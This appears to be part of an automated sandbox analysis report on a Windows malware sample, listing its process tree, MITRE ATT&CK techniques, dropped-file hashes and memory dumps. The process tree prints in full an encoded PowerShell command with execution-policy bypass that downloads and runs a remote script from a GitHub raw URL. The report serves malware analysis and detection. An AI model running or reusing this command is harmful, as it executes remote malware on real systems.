  - Suspicious use of AdjustPrivilegeToken
  PID:4168

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4012
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1872

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1400
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1244

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Web Service

T1102

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8988.tmp

Filesize
1KB

MD5
c5644072039580ce71ae5c76ec7ac7b8

SHA1
03ab8b3a384997bd41225ba9093ab671c4441fb5

SHA256
084e2e4933f9b91fb85af7137356d54f055c6fed9645c612d15a07dfdff58dda

SHA512
83f0b3551de4000897d923d19ff2955d0d1f1b20e7cd4bef8cf120dbee0264bc11f7a13485ea75173aeebfa09733b5d4b4cc5fcea7678f774124516fe6ea72d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1

Filesize
3.0MB

MD5
bcac3bbb18f093dbc8e5e76d2675695f

SHA1
96453f65b41e428937349e6f48fe67d6dfd6a580

SHA256
b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a

SHA512
78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip

Filesize
2.3MB

MD5
42c2a160d2d191e6ffcc1076b4734ee2

SHA1
c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49

SHA256
2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99

SHA512
3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

Download Submit
C:\Users\Admin\AppData\Local\Temp\mwfootvj\mwfootvj.dll

Filesize
3KB

MD5
c5e981068c5556da391313a887fe7299

SHA1
50115df49278d5231f451fce4393fe890b3cabe3

SHA256
657106ab2018084ac08a575269318e9d334d86f5dce9a1ee868a53314582e127

SHA512
55605966d9cae4a624b57ed0abcc7955ae5fcc3ff6821eac6a1275d27441c24be732849307c195b0235f0b20e8db8a11fa8fd66267d8491096e5440f59aaf693

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
55KB

MD5
f357d4e7b83bc0a41c65d97f3e6f50f4

SHA1
71db3180a8ada6d5d7722c54a5940c3490f78636

SHA256
db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba

SHA512
566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
944KB

MD5
d5de6f599d9807bac2f5a8e751a8c38f

SHA1
9e70edf56b6a5768fda84232e9c557e750d3631b

SHA256
18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca

SHA512
e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mwfootvj\CSC7E0D290D1CA4F319B97FAC1981DE798.TMP

Filesize
652B

MD5
da786e57dbd6a373f5221714fff6062a

SHA1
12204167a8dc85136972052c1d06735ed7524f3e

SHA256
d84e30d925036f94a8bcd4004f5934636db2171ecc00c6df48743616f60f5743

SHA512
d083af3dc7874337431693219998a92324efa0342c165c49b909fb2ff4ecdd8e7eb8e1b2e1abf9e7c44e659da591f6f23f27d3ff32f37a93a2551bef0b450367

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mwfootvj\mwfootvj.0.cs

Filesize
507B

MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mwfootvj\mwfootvj.cmdline

Filesize
369B

MD5
ec706ad5d914cd4ef4527dcb83784058

SHA1
621e7304e8716a8da789bfc9202443fa08dc2216

SHA256
2eba50ee54135e70b59f16bfe5ae3fe88459d5859e6baea6fe9b0387472c1a9d

SHA512
20b5e8c8dcfde5b5a961f207315b884bf19f2a1f602637b45ddaf2061accc332dd732181c733a18714f200d9609ba23c96a2f015136afcc5678023bb2881ca55

Download Submit
memory/1244-191-0x00000220035C0000-0x00000220035C2000-memory.dmp

Filesize
8KB

Download
memory/1244-192-0x00000220035C3000-0x00000220035C5000-memory.dmp

Filesize
8KB

Download
memory/1244-193-0x00000220035C6000-0x00000220035C8000-memory.dmp

Filesize
8KB

Download
memory/1244-190-0x00007FFDCFC50000-0x00007FFDD0711000-memory.dmp

Filesize
10.8MB

Download
memory/2812-137-0x0000000000040000-0x0000000002F40000-memory.dmp

Filesize
47.0MB

Download
memory/2812-135-0x00000000054E0000-0x000000000598C000-memory.dmp

Filesize
4.7MB

Download
memory/2812-131-0x0000000005194000-0x00000000054D1000-memory.dmp

Filesize
3.2MB

Download
memory/3692-132-0x000001BA51F10000-0x000001BA51F32000-memory.dmp

Filesize
136KB

Download
memory/3692-133-0x00007FFDCFC50000-0x00007FFDD0711000-memory.dmp

Filesize
10.8MB

Download
memory/3692-134-0x000001BA51250000-0x000001BA51252000-memory.dmp

Filesize
8KB

Download
memory/3692-139-0x000001BA51256000-0x000001BA51258000-memory.dmp

Filesize
8KB

Download
memory/3692-138-0x000001BA51253000-0x000001BA51255000-memory.dmp

Filesize
8KB

Download